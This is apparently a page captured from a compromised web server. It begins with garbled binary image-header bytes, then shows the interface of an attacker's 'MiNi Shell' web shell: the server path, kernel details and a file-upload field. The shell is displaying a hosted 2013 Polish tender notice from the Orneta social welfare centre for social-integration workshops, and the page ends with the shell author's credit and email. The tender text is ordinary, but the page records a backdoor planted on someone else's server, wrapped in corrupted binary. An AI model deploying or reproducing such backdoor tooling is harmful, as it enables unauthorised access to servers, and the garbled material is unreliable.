JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130529/208246-N-2013.html

<p class="kh_header"><b>Orneta: Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu  Otwieramy Drzwi w Przyszłość</b><br>
<b>Numer ogłoszenia: 208246 - 2013; data zamieszczenia: 29.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. 1 Maja 6, 11-130 Orneta, woj. warmińsko-mazurskie, tel. (055) 2421627, faks (055) 2422395.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu  Otwieramy Drzwi w Przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Otwieramy Drzwi w Przyszłość , współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej , Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 

Realizacja działań  projektowych obejmować powinna działania związane z wykorzystaniem usług specjalistów zarówno w szkoleniach i warsztatach  i treningach. 
Działania  te zostały podzielone na 6  części: 
CZĘŚĆ I 
1)Trening kompetencji życiowych, który ma za zadanie naukę rozpoznawania i przeciwdziałania  mechanizmów agresji i przemocy .Celem warsztatów: kształtowanie umiejętności społecznych, komunikacji interpersonalnej oraz rozwoju osobistego, a w tym:autoprezentacji, kreatywności i nastawienie do zmian, metod radzenia sobie ze stresem i przezwyciężania problemów życiowych, zwiększenia pewności siebie, poczucia wpływu na własne życie i możliwości dokonywania świadomych wyborów, wzmocnienie samooceny i poczucia własnej wartości, zwiększenie motywacji do działania, naukę stawiania sobie celów i priorytetów.
Termin  realizacji- od momentu podpisania umowy  do końca lipca 2013 roku. Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy Łączna liczba godzin 20 godziny. Wsparcie skierowane jest dla 33 uczestników z podziałem na 3 grupy: 
Grupa 1- 10 osób - osoby z rodzin z problemami opiekuńczo wychowawczymi
Grupa II- 7 osób- osoby niepełnosprawne
Grupa III- 16 osób- osoby bezrobotne lub nieaktywne zawodowo
    
 2)  Warsztaty z zakresu radzenia sobie z problemami wychowawczymi, mające na celu zwiększenie zaradności życiowej oraz podwyższeniu świadomości pełnienia właściwych ról.
Termin realizacji: od momentu podpisania umowy do końca lipca 2013 roku. Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy  Łączna liczba godzin 20 godziny. Wsparcie skierowane jest dla 10 osób- 1 grupa- osoby z rodzin z problemami opiekuńczo wychowawczymi

CZĘŚĆ II
1)Edukacja prozdrowotna- ma ona na celu uświadomienie współzależności pomiędzy czterema wymiarami zdrowia: fizycznym, psychicznym, społecznym i duchowym. Poprzez promocję zdrowego stylu życia (dbanie o higienę) poznaniem zasad BHP , aktywność fizyczną, która ma być alternatywą radzenia sobie z emocjami oraz przedstawianie i propagowanie różnorodnych form spędzania wolnego czasu np. zajęcia rekreacyjne i sportowe. Poruszenie tematyki seksualności z perspektywy kobiet i mężczyzn.

Termin realizacji: od momentu podpisania umowy do końca sierpnia 2013 roku  Łączna liczba godzin 50 godziny.  Wsparcie skierowane jest dla 33 uczestników z podziałem na 3 grupy: 
Grupa 1- 10 osób - osoby z rodzin z problemami opiekuńczo wychowawczymi
Grupa II- 7 osób- osoby niepełnosprawne
Grupa III- 16 osób- osoby bezrobotne lub nieaktywne zawodowo.

CZĘŚĆ III 
      1) Indywidualne poradnictwo zawodowe- ma na celu określenie kierunków rozwoju i preferencji osobowych uczestników. Na podstawie zebranych informacji powinien zostać opracowany IPD na postawie którego uczestnicy mogą być zakwalifikowani na indywidualne kursy podnoszące kwalifikacje dobrane odpowiednio do ich preferencji i możliwości zawodowych oraz potrzeb lokalnego rynku pracy.
Termin realizacji: od momentu podpisania umowy do końca lipca 2013 roku . Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy. Łączna liczba76 godziny.  Wsparcie skierowane jest dla 33 uczestników z podziałem na 3 grupy: 
Grupa 1- 10 osób - osoby z rodzin z problemami opiekuńczo wychowawczymi
Grupa II- 7 osób- osoby niepełnosprawne
Grupa III- 16 osób- osoby bezrobotne lub nieaktywne zawodowo.
	
 2)Warsztaty kompetencji zawodowych - obejmować powinno edukacje personalną i zawodową uczestników, naukę nowych zachowań na rynku pracy umożliwiającą nabycie umiejętności aktywnego poszukiwania pracy, umiejętności przygotowania CV, listu motywacyjnego, pisania pism urzędowych, podań, zapoznawanie z podstawami prawa pracy, odkrywanie zainteresowań uczestników, nauka autoprezentacji i symulowanie rozmowy kwalifikacyjnej z pracodawcą , opanowanie podstaw negocjacji i mediacji.
 Termin realizacji:  od momentu podpisania umowy do końca sierpnia 2013 roku. Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin 31.Wsparcie skierowane jest dla 33 uczestników z podziałem na 3 grupy: 
Grupa 1- 10 osób - osoby z rodzin z problemami opiekuńczo wychowawczymi
Grupa II- 7 osób- osoby niepełnosprawne
Grupa III- 16 osób- osoby bezrobotne lub nieaktywne zawodowo
3) Warsztaty przedsiębiorczości - tworzenie przedsiębiorstwa społecznego, w tym spółdzielni socjalnych, system wsparcia ekonomii społecznej, dobre praktyki- 16 godzin. Wsparcie skierowane jest dla 16 uczestników- jednia grupa.
Termin realizacji IX 2013  .Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy
CZĘŚĆ IV. 
  1)    Zajęcia psychoedukacyjne (charakter warsztatowy) o następującej tematyce:
zajęcia z komunikacji społecznej
zajęcia z zakresu asertywności
zajęcia z zakresu wzrostu poziomu samooceny i poczucia własnej wartości
łamanie stereotypów dotyczących miejsca kobiet w życiu społecznym i zawodowym
nauka obierania sobie celów i sposobów ich realizacji
      Termin realizacji: od momentu podpisania umowy do końca lipca 2013 roku. Dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin-  25 . Wsparcie skierowane jest dla 33 uczestników z podziałem na 3 grupy: 
Grupa 1- 10 osób - osoby z rodzin z problemami opiekuńczo wychowawczymi
Grupa II- 7 osób- osoby niepełnosprawne
Grupa III- 16 osób- osoby bezrobotne lub nieaktywne zawodowo
  
CZĘŚĆ V.
Zajęcia  rehabilitacyjne stacjonarne- mają na celu zwiększenie aktywność fizycznej oraz poprawę kondycji ruchowej pomagającej poruszać się w życiu codziennym. Poprawienie  utraconej sprawności fizycznej chorego. Celem rehabilitacji jest usunięcie dolegliwości towarzyszących procesom chorobowym oraz zapobieganie nawrotom i postępowi choroby. Zabiegi mają  zwalczyć bólu i stany zapalne, usprawnić czynności poszczególnych narządów, szczególnie narządu ruchu oraz poprawić ogólną wydolności i sprawności organizmu.
Wsparcie skierowane jest do 7 niepełnosprawnych uczestników ( 2 osoby niewidome, 5 osób z upośledzeniem intelektualnym).
Wykonawca sam zapewnia salę do ćwiczeń oraz sprzęt niezbędny do wykonania usługi.
       Łączna liczba godzin 196 godzin po 28 godzin na każdego uczestnika.
Termin realizacji: od momentu podpisania umowy do końca grudnia 2013 roku. Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy

VI. Warsztaty poradnictwa prawnego
Grupowe poradnictwo prawne (metoda realizacji - grupowe poradnictwo prawne w obszarze tematycznym wskazanym w lit.a):
a)Tematy: prawo rodzinne, prawo pracy, spółdzielczości socjalnej, przemocy w rodzinie, inne w razie potrzeby. 
b)Zajęcia realizowane w trzech grupach po 10, 7 i 16 osób. Łączna liczba godzin - 15 .Termin realizacji: październik 2013 roku. Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających 
w sytuacjach kiedy:
zmieni się liczba Uczestników projektu lub
jeżeli w trakcie realizacji projektu modyfikacji ulegną Indywidualne Plany Działania Uczestników lub
w kolejnych latach koniecznym okaże się zakup usług tego samego rodzaju skierowanych do nowych klientów M-GOPS lub nowych Uczestników projektów.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.31.25.00-4, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje i/lub będzie dysponował osobami, które będą odpowiedzialne za świadczenie usług czyli:

CZĘŚĆ I : co najmniej jedna osoba: posiadająca
Wykształcenie- wykształcenie wyższe pedagogiczne lub wyższe  pedagogiczne o specjalności praca socjalna .
Kwalifikacje-
posiadająca szklenie z zakresu przeciwdziałania przemocy w rodzinie
posiadające szklenie z zakresu równości szans  płci
Szkolenie z zakresu asysty rodzinnej lub szkoły dla rodziców
Doświadczenie:    posiadająca co najmniej dwuletnie  doświadczenie (w czasie ostatnich 5 lat) w zawodzie pedagoga lub pracownika socjalnego
  Przeprowadziła: 
1 szkolenie o tematyce Trening kompetencji życiowych lub o podobnej tematyce. 
1 szkolenie o tematyce z zakresu radzenia sobie z problemami wychowawczymi
lub w podobnym/równoważnym zakresie.

CZĘŚĆII -co najmniej jedna osoba: posiadająca  Wykształcenie -wykształcenie wyższe pedagogiczne  lub wykształcenie wyższe pedagogiczne o kierunku wychowanie fizyczne.
Kwalifikacje:
-  kurs z zakresu Nordic Walking
-  kurs, szkolenie, seminarium itp.  z zakresu profilaktyki ochrony zdrowia   
- kurs/ szkolenie z zakresu BHP
Doświadczenie: posiadająca co najmniej czteroletnie  doświadczenie (w czasie ostatnich 6 lat) w zawodzie pedagoga lub animatora.
Przeprowadziła:
1 zajęcia z edukacji prozdrowotnej   lub w podobnym/równoważnym zakresie.

CZĘŚĆ III.  -co najmniej jedna osoba:
Wykształcenie-  posiadające wykształcenie wyższe o kierunku doradca zawodowy lub posiadająca  uprawnienia do wykonywania zawodu doradcy zawodowego (licencja doradcy zawodowego) 
Kwalifikacje:
- posiadające szklenie z zakresu równości szans  płci 
- posiadający szkolenia z zakresu zakładania i prowadzenia spółdzielni socjalnych 
Doświadczenie- posiadająca co najmniej roczne  doświadczenie (w czasie ostatnich 6 lat) w zawodzie doradcy zawodowego
Przeprowadziła:
- 1 zajęcia z indywidualnego poradnictwa zawodowego
- 1 warsztaty kompetencji zawodowych
- 1 warsztaty przedsiębiorczości
lub w podobnym/równoważnym zakresie.

CZĘŚĆ IV  - co najmniej jedna osoba  posiadająca
Wykształcenie- wykształcenie wyższe mgr psychologii 
Doświadczenie- dwuletnie doświadczenie w zawodzie psychologa
Przeprowadziła:
1 zajęcia psychoedukacyjne lub w podobnym/równoważnym zakresie.

CZĘŚĆ V-  co najmniej jedna osoba posiadająca- Wykształcenie: wykształcenie wyższe o kierunku fizjoterapia. Doświadczenie: Co najmniej 3 letnie doświadczenie w zawodzie fizjoterapeuty.( w czasie ostatnich 5 lat)

CZĘŚĆ VI- co najmniej jedna osoba posiadająca:
Wykształcenie - wykształcenie wyższe o kierunku  prawo
Doświadczenie- trzyletnie  doświadczenie w poradnictwie prawnym 
Przeprowadziła 1 zajęcia z podanej w opisie tematyki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doswiadczenie - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną 
w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 ustawy - Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.),
Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu,
zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy,
w przypadku zmian na liście Uczestników projektu i/lub Indywidualnych Planów Działania ilości osób biorących udział w poszczególnych kursach/szkoleniach warsztatach mogą ulec zmianie. Do obliczenia należnego wynagrodzenia zastosuje się wówczas algorytm (cena ryczałtowa za daną część/ilość uczestników przewidzianych SIWZ * ilość Uczestników biorących udział w zajęciach).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Biuletyn Informacji Publicznej Urzędu Miejskiego w Ornecie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> M-GOPS Orneta, ul., 1 Maja 6, 11-130 Orneta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 10:30, miejsce: MiejskoGminny Ośrodek Pomocy Społecznej w Ornecie, ul. 1 Maja 6 , 11-130 Orneta, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Otwieramy Drzwi w Przyszłość , współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej , Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com